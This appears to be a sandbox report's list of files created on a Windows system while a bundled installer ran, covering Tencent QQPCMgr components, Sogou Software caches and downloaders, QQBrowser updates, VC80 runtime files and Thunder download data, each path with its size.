%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysspeeduprtpplugin\SysSpeedupRtpPlugin.dll (46 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMRouterPlugin.png (722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1093.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\pluginctrl.xml (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCB2AndroidJmp_QO.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\tencentdl.exe (7433 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbOGList.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr05.def (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.tpc (818 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MobileSoftMgr.dll (126 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\xImage.dll (2243 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMon.sys (47 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.dll (6138 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_116.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10001.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSafeBoxHelperDll.dll (1222 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibblackac.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMBluescreenFixer\bugreport.exe (5919 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QMRealTimeSpeedupSkinCenter\QMRealTimeSpeedupSkinCenter.zip (601 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMDnsPlugin.png (409 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQRepair.exe (1097 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCLeakScan_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1101.dat (446 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qmsxtboxplugin.png (822 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.tpc (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\arkGraphic.dll (3995 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtSysCommonMgrGF.rdb (68 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFileOpen.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\jgImage.dll (164 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1010.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\zlib.dll (1174 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\SpeedupMsg.dll (3960 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCfix.dll (8576 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.dll (3615 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1230.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\RefuseInjectShell.DAT (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_890.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMPerfCtrl\QMPerf.dll (2701 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\Common.dll (15539 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftGame.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTipsConfig.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScanLib2.dat (53 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr02.def (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\zlib.dll (1033 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1408.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_123.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\CubeConfig.ini (108 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMain.dll (17622 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\polyphone.dat (12 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpController.dll (1506 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\libjpegturbo.dll (3301 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHelper.sys (34 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_862.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.rdb (130 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.tpc (715 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOServicePlugin.etf (545 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileOpen.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMClinicsettingcenter\QMClinicSettingCenter.dll (4116 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\arkGraphic.dll (3659 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgrWList.etf (633 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GlobalConfig.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\jgImage.dll (440 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLaunch.exe (30 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.rdb (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\QMInsys.sys (1940 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLibRisk.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QMHealthAssist_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtsysSoftIcon.dll (2098 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QMGameSpeedup_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield32.png (578 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.rdb (241 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\Bin\SSOCommon.dll (10861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\RemNPX.exe (1764 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.dll (6633 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\harddiskmark.etf (40 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLeakScan.exe (7366 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\InstAsm.exe (1137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVPedc.dll (2205 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\speech.dat (91 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQFileFlt.dll (838 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\StartupMgr.rdb (9005 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\PluginPackage\InstallCfg.xml (156 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.tpc (905 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\oDayProtect.dll (86 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\Common.dll (17134 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1031.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1223.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.exe (6074 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHW-x64.sys (512 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\xImage.dll (2533 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMAdFilter.png (545 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sBoth_Disconnected.png (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\supplyID.xml (266 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.tpc (674 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1402.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TVL00001.tvl (6396 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSUrlLib.DAT (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm03.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\TurnOnAdapter.png (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetConnect.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\pinyin.lis (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1603.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TestStubConfig.xml (425 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\arkGraphic.dll (5320 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\com.qq.qmchext.json (209 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\xImage.dll (4051 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tssk.sys (1616 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Tencentdl.exe (9871 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1030.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virdex02.def (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10007.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIESafeDll.dll (2233 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\I18N\2052\PGFStringBundle.xml (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1944.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCUpdate.dat (656 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1095.dat (452 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCMgr.exe (601 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsvulsha.dat (109 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebShieldInject.dll (1172 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinic.png (931 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMBDScanner.dat (35 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMNewsTips\QMNewsTips.rdb (22 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\RocketConfig.etf (406 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPExternalScan\HPFirewareScanner.dll (2370 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCClinicSys.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\qqpclaunch\QQPCLaunch.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernel.sys (852 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.rdb (3744 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_157.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\ATL80.dll (1915 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libjpegturbo.dll (4099 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMClinicCore.dll (9313 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetflowOpti\NetflowOpti.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDns.dll (62 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.dll (1875 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCVulPage.rdb (1812 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\xImage.dll (2643 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MalwareLogic.dll (2064 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftCmd.exe (3473 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_115.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1755.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderInfo.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DLProtectComm.dll (1722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\CODConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10482.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant.rdb (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\net_err.jpg (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.dll (5038 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_657.png (794 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.exe (7102 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SoftUninstall\SoftUninstall.dll (5765 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\LoadError.html (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftTrayTips.rdb (492 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLeakScan.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1415.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmsoftmgrupdate\QMSoftMgrUpdate.dll (2641 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\UDiskShellExt.dll (2502 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\LocalInfo.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SuiteDownloader20160222153349.exe (152096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\381427456234840[1].jpg (10332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[4].png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\ie-css3[1].htc (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[3].png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[1].jpg (3208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[3].png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[3].png (10542 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\imagick[1].jpg (696 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (1283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[2].png (1367 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[1].png (2084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\link[1].png (6666 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\PCID.xml (685 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\sogousoftware.db (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\scroll[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[4].png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\loading[1].gif (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\SuiteDownloader20160222153349[1].exe (304936 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[4].png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\jquery-1.11.1.min[1].js (50457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[3].png (392 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\SilentParaReponse.xml (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[2].png (5665 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\sogousoftware.db-journal (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\link[1].png (2675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\ranking-ico[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\jquery-1.7.2.min[1].js (45457 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\ie-css3[1].htc (1012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\741430117543639[1].png (22752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\ranking-ico[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[2].png (6423 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\link[1].png (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SG.jpeg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\recommend[1].css (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\SogouSoftwareExternalApp[1].exe (1006360 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\NewVersionReponse.xml (1 bytes)
%Program Files%\SogouSoftware\tmp\ExternalApp.exe (595769 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\OnlineIconReponse.xml (359 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1940 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\CC1430117533187[1].png (14468 bytes)
%Documents and Settings%\%current user%\Application Data\2320808333768086190_4848.jpeg (7 bytes)
%Documents and Settings%\%current user%\Application Data\SogouSoftware\data\cache\SoftInfo.xml (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\link[2].png (1622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\ranking[1].css (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\QQBrowser_Setup_9.4.7658.400_9.4.exe.qbl (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\F1Assistant.dll (19686 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\UpdateFiles\desc.txt (1 bytes)
%WinDir%\WinSxS\InstallTemp\732509\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcm80.dll (3073 bytes)
%WinDir%\WinSxS\InstallTemp\776418\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\842843\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.Policy (804 bytes)
%WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll (3361 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff (4 bytes)
%WinDir%\WinSxS\InstallTemp\806309\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\ATL80.dll (601 bytes)
%WinDir%\WinSxS\InstallTemp\800656\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.Policy (808 bytes)
%WinDir%\WinSxS\InstallTemp\806309\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\776418\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.Manifest (1 bytes)
%WinDir%\WinSxS\InstallTemp\800656\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcr80.dll (5873 bytes)
%WinDir%\WinSxS\InstallTemp\825721\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\732509\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\806309\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.Manifest (466 bytes)
%WinDir%\WinSxS\InstallTemp\776418\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcp80.dll (7433 bytes)
%WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll (4185 bytes)
%WinDir%\WinSxS\InstallTemp\732509\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\ATL80.dll (601 bytes)
%WinDir%\WinSxS\InstallTemp\761294\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.Policy (808 bytes)
%WinDir%\WinSxS\InstallTemp\732509\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.Manifest (468 bytes)
%WinDir%\WinSxS\InstallTemp\761294\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\806309\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\825721\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\816749\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.Policy (804 bytes)
%WinDir%\WinSxS\InstallTemp\825721\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcm80.dll (3073 bytes)
%WinDir%\WinSxS\InstallTemp\825721\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.Manifest (1 bytes)
%WinDir%\WinSxS\InstallTemp\842843\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.cat (7 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\DownloadLib\pub_store.dat (405 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\stat.dat (44 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\error.dat (287 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\asyn_frame.dat (1967 bytes)
C:\SogouDownload\WiFi-2175.exe.td (9317 bytes)
